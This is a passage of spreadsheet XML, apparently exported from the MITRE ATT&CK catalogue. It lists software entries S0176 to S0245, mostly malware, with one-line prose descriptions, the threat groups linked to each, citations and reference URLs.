    <t>[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0176</t>
  </si>
  <si>
    <t>S0177</t>
  </si>
  <si>
    <t>Power Loader</t>
  </si>
  <si>
    <t>[Power Loader](https://attack.mitre.org/software/S0177) is modular code sold in the cybercrime market used as a downloader in malware families such as Carberp, Redyms and Gapz. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0177</t>
  </si>
  <si>
    <t>S0178</t>
  </si>
  <si>
    <t>Truvasys</t>
  </si>
  <si>
    <t>[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. (Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0178</t>
  </si>
  <si>
    <t>S0179</t>
  </si>
  <si>
    <t>MimiPenguin</t>
  </si>
  <si>
    <t>[MimiPenguin](https://attack.mitre.org/software/S0179) is a credential dumper, similar to [Mimikatz](https://attack.mitre.org/software/S0002), designed specifically for Linux platforms. (Citation: MimiPenguin GitHub May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0179</t>
  </si>
  <si>
    <t>S0180</t>
  </si>
  <si>
    <t>Volgmer</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0180</t>
  </si>
  <si>
    <t>S0181</t>
  </si>
  <si>
    <t>FALLCHILL</t>
  </si>
  <si>
    <t>[FALLCHILL](https://attack.mitre.org/software/S0181) is a RAT that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) since at least 2016 to target the aerospace, telecommunications, and finance industries. It is usually dropped by other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware or delivered when a victim unknowingly visits a compromised website. (Citation: US-CERT FALLCHILL Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0181</t>
  </si>
  <si>
    <t>S0182</t>
  </si>
  <si>
    <t>FinFisher</t>
  </si>
  <si>
    <t>[FinFisher](https://attack.mitre.org/software/S0182) is a government-grade commercial surveillance spyware reportedly sold exclusively to government agencies for use in targeted and lawful criminal investigations. It is heavily obfuscated and uses multiple anti-analysis techniques. It has other variants including [Wingbird](https://attack.mitre.org/software/S0176). (Citation: FinFisher Citation) (Citation: Microsoft SIR Vol 21) (Citation: FireEye FinSpy Sept 2017) (Citation: Securelist BlackOasis Oct 2017) (Citation: Microsoft FinFisher March 2018)</t>
  </si>
  <si>
    <t>Windows, Android</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0182</t>
  </si>
  <si>
    <t>S0183</t>
  </si>
  <si>
    <t>Tor</t>
  </si>
  <si>
    <t>[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes "Onion Routing," in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0183</t>
  </si>
  <si>
    <t>S0184</t>
  </si>
  <si>
    <t>POWRUNER</t>
  </si>
  <si>
    <t>[POWRUNER](https://attack.mitre.org/software/S0184) is a PowerShell script that sends and receives commands to and from the C2 server. (Citation: FireEye APT34 Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0184</t>
  </si>
  <si>
    <t>S0185</t>
  </si>
  <si>
    <t>SEASHARPEE</t>
  </si>
  <si>
    <t>[SEASHARPEE](https://attack.mitre.org/software/S0185) is a Web shell that has been used by [APT34](https://attack.mitre.org/groups/G0057). (Citation: FireEye APT34 Webinar Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0185</t>
  </si>
  <si>
    <t>S0186</t>
  </si>
  <si>
    <t>DownPaper</t>
  </si>
  <si>
    <t>[DownPaper](https://attack.mitre.org/software/S0186) is a backdoor Trojan; its main functionality is to download and run second stage malware. (Citation: ClearSky Charming Kitten Dec 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0186</t>
  </si>
  <si>
    <t>S0187</t>
  </si>
  <si>
    <t>Daserf</t>
  </si>
  <si>
    <t>[Daserf](https://attack.mitre.org/software/S0187) is a backdoor that has been used to spy on and steal from Japanese, South Korean, Russian, Singaporean, and Chinese victims. Researchers have identified versions written in both Visual C and Delphi. (Citation: Trend Micro Daserf Nov 2017) (Citation: Secureworks BRONZE BUTLER Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0187</t>
  </si>
  <si>
    <t>S0188</t>
  </si>
  <si>
    <t>Starloader</t>
  </si>
  <si>
    <t>[Starloader](https://attack.mitre.org/software/S0188) is a loader component that has been observed loading [Felismus](https://attack.mitre.org/software/S0171) and associated tools. (Citation: Symantec Sowbug Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0188</t>
  </si>
  <si>
    <t>S0189</t>
  </si>
  <si>
    <t>ISMInjector</t>
  </si>
  <si>
    <t>[ISMInjector](https://attack.mitre.org/software/S0189) is a Trojan used to install another [OilRig](https://attack.mitre.org/groups/G0049) backdoor, ISMAgent. (Citation: OilRig New Delivery Oct 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0189</t>
  </si>
  <si>
    <t>S0190</t>
  </si>
  <si>
    <t>BITSAdmin</t>
  </si>
  <si>
    <t>[BITSAdmin](https://attack.mitre.org/software/S0190) is a command line tool used to create and manage [BITS Jobs](https://attack.mitre.org/techniques/T1197). (Citation: Microsoft BITSAdmin)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0190</t>
  </si>
  <si>
    <t>S0191</t>
  </si>
  <si>
    <t>Winexe</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Ãœberwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0191</t>
  </si>
  <si>
    <t>S0192</t>
  </si>
  <si>
    <t>Pupy</t>
  </si>
  <si>
    <t>[Pupy](https://attack.mitre.org/software/S0192) is an open source, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool. (Citation: GitHub Pupy) It is written in Python and can be generated as a payload in several different ways (Windows exe, Python file, PowerShell oneliner/file, Linux elf, APK, Rubber Ducky, etc.). (Citation: GitHub Pupy) [Pupy](https://attack.mitre.org/software/S0192) is publicly available on GitHub. (Citation: GitHub Pupy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0192</t>
  </si>
  <si>
    <t>S0193</t>
  </si>
  <si>
    <t>Forfiles</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) is a Windows utility commonly used in batch jobs to execute commands on one or more selected files or directories (ex: list all directories in a drive, read the first line of all files created yesterday, etc.). Forfiles can be executed from either the command line, Run window, or batch files/scripts. (Citation: Microsoft Forfiles Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0193</t>
  </si>
  <si>
    <t>S0194</t>
  </si>
  <si>
    <t>PowerSploit</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1086) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0194</t>
  </si>
  <si>
    <t>S0195</t>
  </si>
  <si>
    <t>SDelete</t>
  </si>
  <si>
    <t>[SDelete](https://attack.mitre.org/software/S0195) is an application that securely deletes data in a way that makes it unrecoverable. It is part of the Microsoft Sysinternals suite of tools. (Citation: Microsoft SDelete July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0195</t>
  </si>
  <si>
    <t>S0196</t>
  </si>
  <si>
    <t>PUNCHBUGGY</t>
  </si>
  <si>
    <t>[PUNCHBUGGY](https://attack.mitre.org/software/S0196) is a backdoor malware used by [FIN8](https://attack.mitre.org/groups/G0061) that has been observed targeting POS networks in the hospitality industry. (Citation: Morphisec ShellTea June 2019)(Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0196</t>
  </si>
  <si>
    <t>S0197</t>
  </si>
  <si>
    <t>PUNCHTRACK</t>
  </si>
  <si>
    <t>[PUNCHTRACK](https://attack.mitre.org/software/S0197) is non-persistent point of sale (POS) system malware utilized by [FIN8](https://attack.mitre.org/groups/G0061) to scrape payment card data. (Citation: FireEye Fin8 May 2016) (Citation: FireEye Know Your Enemy FIN8 Aug 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0197</t>
  </si>
  <si>
    <t>S0198</t>
  </si>
  <si>
    <t>NETWIRE</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) is a publicly available, multiplatform remote administration tool (RAT) that has been used by criminal and APT groups since at least 2012. (Citation: FireEye APT33 Sept 2017) (Citation: McAfee Netwire Mar 2015) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0198</t>
  </si>
  <si>
    <t>S0199</t>
  </si>
  <si>
    <t>TURNEDUP</t>
  </si>
  <si>
    <t>[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0199</t>
  </si>
  <si>
    <t>S0200</t>
  </si>
  <si>
    <t>Dipsind</t>
  </si>
  <si>
    <t>[Dipsind](https://attack.mitre.org/software/S0200) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://attack.mitre.org/groups/G0068). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0200</t>
  </si>
  <si>
    <t>S0201</t>
  </si>
  <si>
    <t>JPIN</t>
  </si>
  <si>
    <t>[JPIN](https://attack.mitre.org/software/S0201) is a custom-built backdoor family used by [PLATINUM](https://attack.mitre.org/groups/G0068). Evidence suggests developers of [JPIN](https://attack.mitre.org/software/S0201) and [Dipsind](https://attack.mitre.org/software/S0200) code bases were related in some way. (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0201</t>
  </si>
  <si>
    <t>S0202</t>
  </si>
  <si>
    <t>adbupd</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0202</t>
  </si>
  <si>
    <t>S0203</t>
  </si>
  <si>
    <t>Hydraq</t>
  </si>
  <si>
    <t>[Hydraq](https://attack.mitre.org/software/S0203) is a data-theft trojan first used by [Elderwood](https://attack.mitre.org/groups/G0066) in the 2009 Google intrusion known as Operation Aurora, though variations of this trojan have been used in more recent campaigns by other Chinese actors, possibly including [APT17](https://attack.mitre.org/groups/G0025). (Citation: MicroFocus 9002 Aug 2016) (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Trojan.Hydraq Jan 2010) (Citation: ASERT Seven Pointed Dagger Aug 2015) (Citation: FireEye DeputyDog 9002 November 2013) (Citation: ProofPoint GoT 9002 Aug 2017) (Citation: FireEye Sunshop Campaign May 2013) (Citation: PaloAlto 3102 Sept 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0203</t>
  </si>
  <si>
    <t>S0204</t>
  </si>
  <si>
    <t>Briba</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor and download files on to compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0204</t>
  </si>
  <si>
    <t>S0205</t>
  </si>
  <si>
    <t>Naid</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0205</t>
  </si>
  <si>
    <t>S0206</t>
  </si>
  <si>
    <t>Wiarp</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0206</t>
  </si>
  <si>
    <t>S0207</t>
  </si>
  <si>
    <t>Vasport</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0207</t>
  </si>
  <si>
    <t>S0208</t>
  </si>
  <si>
    <t>Pasam</t>
  </si>
  <si>
    <t>[Pasam](https://attack.mitre.org/software/S0208) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Pasam May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0208</t>
  </si>
  <si>
    <t>S0209</t>
  </si>
  <si>
    <t>Darkmoon</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0209</t>
  </si>
  <si>
    <t>S0210</t>
  </si>
  <si>
    <t>Nerex</t>
  </si>
  <si>
    <t>[Nerex](https://attack.mitre.org/software/S0210) is a Trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Nerex May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0210</t>
  </si>
  <si>
    <t>S0211</t>
  </si>
  <si>
    <t>Linfo</t>
  </si>
  <si>
    <t>[Linfo](https://attack.mitre.org/software/S0211) is a rootkit trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Linfo May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0211</t>
  </si>
  <si>
    <t>S0212</t>
  </si>
  <si>
    <t>CORALDECK</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) is an exfiltration tool used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0212</t>
  </si>
  <si>
    <t>S0213</t>
  </si>
  <si>
    <t>DOGCALL</t>
  </si>
  <si>
    <t>[DOGCALL](https://attack.mitre.org/software/S0213) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) that has been used to target South Korean government and military organizations in 2017. It is typically dropped using a Hangul Word Processor (HWP) exploit. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0213</t>
  </si>
  <si>
    <t>S0214</t>
  </si>
  <si>
    <t>HAPPYWORK</t>
  </si>
  <si>
    <t>[HAPPYWORK](https://attack.mitre.org/software/S0214) is a downloader used by [APT37](https://attack.mitre.org/groups/G0067) to target South Korean government and financial victims in November 2016. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0214</t>
  </si>
  <si>
    <t>S0215</t>
  </si>
  <si>
    <t>KARAE</t>
  </si>
  <si>
    <t>[KARAE](https://attack.mitre.org/software/S0215) is a backdoor typically used by [APT37](https://attack.mitre.org/groups/G0067) as first-stage malware. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0215</t>
  </si>
  <si>
    <t>S0216</t>
  </si>
  <si>
    <t>POORAIM</t>
  </si>
  <si>
    <t>[POORAIM](https://attack.mitre.org/software/S0216) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) in campaigns since at least 2014. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0216</t>
  </si>
  <si>
    <t>S0217</t>
  </si>
  <si>
    <t>SHUTTERSPEED</t>
  </si>
  <si>
    <t>[SHUTTERSPEED](https://attack.mitre.org/software/S0217) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0217</t>
  </si>
  <si>
    <t>S0218</t>
  </si>
  <si>
    <t>SLOWDRIFT</t>
  </si>
  <si>
    <t>[SLOWDRIFT](https://attack.mitre.org/software/S0218) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067) against academic and strategic victims in South Korea. (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0218</t>
  </si>
  <si>
    <t>S0219</t>
  </si>
  <si>
    <t>WINERACK</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0219</t>
  </si>
  <si>
    <t>S0220</t>
  </si>
  <si>
    <t>Chaos</t>
  </si>
  <si>
    <t>[Chaos](https://attack.mitre.org/software/S0220) is Linux malware that compromises systems by brute force attacks against SSH services. Once installed, it provides a reverse shell to its controllers, triggered by unsolicited packets. (Citation: Chaos Stolen Backdoor)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0220</t>
  </si>
  <si>
    <t>S0221</t>
  </si>
  <si>
    <t>Umbreon</t>
  </si>
  <si>
    <t>A Linux rootkit that provides backdoor access and hides from defenders.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0221</t>
  </si>
  <si>
    <t>S0222</t>
  </si>
  <si>
    <t>CCBkdr</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) is malware that was injected into a signed version of CCleaner and distributed from CCleaner's distribution website. (Citation: Talos CCleanup 2017) (Citation: Intezer Aurora Sept 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0222</t>
  </si>
  <si>
    <t>S0223</t>
  </si>
  <si>
    <t>POWERSTATS</t>
  </si>
  <si>
    <t>[POWERSTATS](https://attack.mitre.org/software/S0223) is a PowerShell-based first stage backdoor used by [MuddyWater](https://attack.mitre.org/groups/G0069). (Citation: Unit 42 MuddyWater Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0223</t>
  </si>
  <si>
    <t>S0224</t>
  </si>
  <si>
    <t>Havij</t>
  </si>
  <si>
    <t>[Havij](https://attack.mitre.org/software/S0224) is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries. (Citation: Check Point Havij Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0224</t>
  </si>
  <si>
    <t>S0225</t>
  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0225</t>
  </si>
  <si>
    <t>S0226</t>
  </si>
  <si>
    <t>Smoke Loader</t>
  </si>
  <si>
    <t>[Smoke Loader](https://attack.mitre.org/software/S0226) is a malicious bot application that can be used to load other malware.
[Smoke Loader](https://attack.mitre.org/software/S0226) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. (Citation: Malwarebytes SmokeLoader 2016) (Citation: Microsoft Dofoil 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0226</t>
  </si>
  <si>
    <t>S0227</t>
  </si>
  <si>
    <t>spwebmember</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0227</t>
  </si>
  <si>
    <t>S0228</t>
  </si>
  <si>
    <t>NanHaiShu</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) is a remote access tool and JScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). [NanHaiShu](https://attack.mitre.org/software/S0228) has been used to target government and private-sector organizations that have relations to the South China Sea dispute. (Citation: Proofpoint Leviathan Oct 2017) (Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0228</t>
  </si>
  <si>
    <t>S0229</t>
  </si>
  <si>
    <t>Orz</t>
  </si>
  <si>
    <t>[Orz](https://attack.mitre.org/software/S0229) is a custom JavaScript backdoor used by [Leviathan](https://attack.mitre.org/groups/G0065). It was observed being used in 2014 as well as in August 2017 when it was dropped by Microsoft Publisher files. (Citation: Proofpoint Leviathan Oct 2017) (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0229</t>
  </si>
  <si>
    <t>S0230</t>
  </si>
  <si>
    <t>ZeroT</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0230</t>
  </si>
  <si>
    <t>S0231</t>
  </si>
  <si>
    <t>Invoke-PSImage</t>
  </si>
  <si>
    <t>[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0231</t>
  </si>
  <si>
    <t>S0232</t>
  </si>
  <si>
    <t>HOMEFRY</t>
  </si>
  <si>
    <t>[HOMEFRY](https://attack.mitre.org/software/S0232) is a 64-bit Windows password dumper/cracker that has previously been used in conjunction with other [Leviathan](https://attack.mitre.org/groups/G0065) backdoors. (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0232</t>
  </si>
  <si>
    <t>S0233</t>
  </si>
  <si>
    <t>MURKYTOP</t>
  </si>
  <si>
    <t>[MURKYTOP](https://attack.mitre.org/software/S0233) is a reconnaissance tool used by [Leviathan](https://attack.mitre.org/groups/G0065). (Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0233</t>
  </si>
  <si>
    <t>S0234</t>
  </si>
  <si>
    <t>Bandook</t>
  </si>
  <si>
    <t>[Bandook](https://attack.mitre.org/software/S0234) is a commercially available RAT, written in Delphi, which has been available since roughly 2007  (Citation: EFF Manul Aug 2016) (Citation: Lookout Dark Caracal Jan 2018).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0234</t>
  </si>
  <si>
    <t>S0235</t>
  </si>
  <si>
    <t>CrossRAT</t>
  </si>
  <si>
    <t>[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0235</t>
  </si>
  <si>
    <t>S0236</t>
  </si>
  <si>
    <t>Kwampirs</t>
  </si>
  <si>
    <t>[Kwampirs](https://attack.mitre.org/software/S0236) is a backdoor Trojan used by [Orangeworm](https://attack.mitre.org/groups/G0071). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. (Citation: Symantec Orangeworm April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0236</t>
  </si>
  <si>
    <t>S0237</t>
  </si>
  <si>
    <t>GravityRAT</t>
  </si>
  <si>
    <t>[GravityRAT](https://attack.mitre.org/software/S0237) is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India. (Citation: Talos GravityRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0237</t>
  </si>
  <si>
    <t>S0238</t>
  </si>
  <si>
    <t>Proxysvc</t>
  </si>
  <si>
    <t>[Proxysvc](https://attack.mitre.org/software/S0238) is a malicious DLL used by [Lazarus Group](https://attack.mitre.org/groups/G0032) in a campaign known as Operation GhostSecret. It has appeared to be operating undetected since 2017 and was mostly observed in higher education organizations. The goal of [Proxysvc](https://attack.mitre.org/software/S0238) is to deliver additional payloads to the target and to maintain control for the attacker. It is in the form of a DLL that can also be executed as a standalone process. (Citation: McAfee GhostSecret)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0238</t>
  </si>
  <si>
    <t>S0239</t>
  </si>
  <si>
    <t>Bankshot</t>
  </si>
  <si>
    <t>[Bankshot](https://attack.mitre.org/software/S0239) is a remote access tool (RAT) that was first reported by the Department of Homeland Security in December of 2017. In 2018, [Lazarus Group](https://attack.mitre.org/groups/G0032) used the [Bankshot](https://attack.mitre.org/software/S0239) implant in attacks against the Turkish financial sector. (Citation: McAfee Bankshot)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0239</t>
  </si>
  <si>
    <t>S0240</t>
  </si>
  <si>
    <t>ROKRAT</t>
  </si>
  <si>
    <t>[ROKRAT](https://attack.mitre.org/software/S0240) is a cloud-based remote access tool (RAT) used by [APT37](https://attack.mitre.org/groups/G0067). This software has been used to target victims in South Korea. [APT37](https://attack.mitre.org/groups/G0067) used ROKRAT during several campaigns in 2016 through 2018. (Citation: Talos ROKRAT) (Citation: Talos Group123)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0240</t>
  </si>
  <si>
    <t>S0241</t>
  </si>
  <si>
    <t>RATANKBA</t>
  </si>
  <si>
    <t>[RATANKBA](https://attack.mitre.org/software/S0241) is a remote controller tool used by [Lazarus Group](https://attack.mitre.org/groups/G0032). [RATANKBA](https://attack.mitre.org/software/S0241) has been used in attacks targeting financial institutions in Poland, Mexico, Uruguay, the United Kingdom, and Chile. It was also seen used against organizations related to telecommunications, management consulting, information technology, insurance, aviation, and education. [RATANKBA](https://attack.mitre.org/software/S0241) has a graphical user interface to allow the attacker to issue jobs to perform on the infected machines. (Citation: Lazarus RATANKBA) (Citation: RATANKBA)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0241</t>
  </si>
  <si>
    <t>S0242</t>
  </si>
  <si>
    <t>SynAck</t>
  </si>
  <si>
    <t>[SynAck](https://attack.mitre.org/software/S0242) is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. (Citation: SecureList SynAck Doppelgänging May 2018) (Citation: Kaspersky Lab SynAck May 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0242</t>
  </si>
  <si>
    <t>S0243</t>
  </si>
  <si>
    <t>DealersChoice</t>
  </si>
  <si>
    <t>[DealersChoice](https://attack.mitre.org/software/S0243) is a Flash exploitation framework used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: Sofacy DealersChoice)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0243</t>
  </si>
  <si>
    <t>S0244</t>
  </si>
  <si>
    <t>Comnie</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) is a remote backdoor which has been used in attacks in East Asia. (Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0244</t>
  </si>
  <si>
    <t>S0245</t>
  </si>
  <si>
    <t>BADCALL</t>
  </si>
  <si>
